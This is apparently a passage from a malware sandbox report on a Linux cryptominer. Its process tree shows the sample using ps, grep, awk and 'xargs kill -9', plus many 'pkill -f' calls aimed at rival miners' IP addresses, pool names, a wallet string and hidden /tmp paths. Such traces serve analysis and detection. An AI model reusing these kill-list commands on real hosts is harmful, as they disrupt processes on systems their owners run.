                                                                                                                                                                                                                                                                • /usr/bin/ls
                                                                                                                                                                                                                                                                  ls -la /etc
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:1682
                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                    awk "{if(\$3>80.0) print \$2}"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:1694
                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                      grep -v grep
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1693
                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                        grep agetty
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:1692
                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                          PID:1695
                                                                                                                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                                                                                                                          ps aux
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                          PID:1691
                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                          pkill -f 42.112.28.216
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                          PID:1707
                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                          PID:1713
                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:1712
                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                            awk "{print \$7}"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1710
                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                              grep 207.38.87.6
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:1709
                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1711
                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:1718
                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                    PID:1719
                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:1716
                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:1717
                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                        grep 127.0.0.1:52018
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:1715
                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                          PID:1725
                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:1724
                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1723
                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:1722
                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                grep 34.81.218.76:9486
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:1721
                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:1731
                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                      PID:1733
                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1730
                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                        grep 42.112.28.216:9486
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:1729
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .git/kthreaddw
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1736
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 80.211.206.105
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1738
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 207.38.87.6
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f p8444
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1751
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f supportxmr
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1767
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f monero
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1779
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f kthreaddi
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1780
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f srv00
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1781
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.javae/javae
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1782
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .javae
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1783
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .syna
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1784
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f .main
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1785
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f xmm
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1786
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f solr.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1787
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.solr/solrd
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/javac
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1789
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.go.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1790
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/agetty
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1791
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/kworker
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f c3pool
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1793
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.X11-unix/gitag-ssh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1794
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1795
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/okk.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          PID:1796
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/gitaly
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1797
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.x/kworker
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1798
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1799
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.X11-unix/supervise
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1800
                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                          pkill -f /tmp/.ssh/redis.sh
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                          PID:1801
                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                          awk "{print \$2}"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:1805
                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                            grep -v grep
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                              PID:1806
                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                              grep ./udp
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:1803
                                                                                                                                                                                                                                                                                                              • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                ps aux
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                PID:1802
                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                PID:1808
                                                                                                                                                                                                                                                                                                              • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                cat /tmp/.X11-unix/01
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1807
                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                  PID:1810
                                                                                                                                                                                                                                                                                                                • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                  cat /tmp/.X11-unix/11
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:1809
                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                    PID:1812
                                                                                                                                                                                                                                                                                                                  • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                    cat /tmp/.X11-unix/22
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1811
                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                      PID:1814
                                                                                                                                                                                                                                                                                                                    • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                      cat /tmp/.pg_stat.0
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:1813
                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                                                                                                                                      • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                        cat /tmp/.pg_stat.1
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:1815
                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                          PID:1818
                                                                                                                                                                                                                                                                                                                        • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                          cat /data/./oka.pid
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:1817
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f zsvc
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1819
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f pdefenderd
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f updatecheckerd
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1821
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f cruner
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1822
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f dbused
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            PID:1823
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f bashirc
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                            PID:1824
                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                            pkill -f meminitsrv
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                            PID:1825
                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                            PID:1830
                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                            awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:1829
                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                              grep -v grep
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:1828
                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                grep ./oka
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:1827
                                                                                                                                                                                                                                                                                                                                • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                  PID:1826
                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                  PID:1835
                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                  awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:1834
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:1833
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                      grep "postgres: autovacum"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                        ps aux
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                        PID:1831
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                        grep -v proxymap
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:1842
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                          grep -v postgres
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:1843
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                            PID:1847
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                            grep -v postgrey
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:1844
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                              grep -v kinsing
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:1845
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1846
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                  grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1841
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                    grep -v "("
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:1840
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                      grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1839
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                        grep -v bin
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1838
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                          awk "length(\$1) == 8"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1837
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                            ps ax -o "command,pid" -www
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                            PID:1836
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                            grep -v proxymap
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1854
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                              grep -v postgres
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1855
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                grep -v postgrey
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1856
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1857
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                    PID:1858
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                    grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1853
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                      grep -v "("
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1852
                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
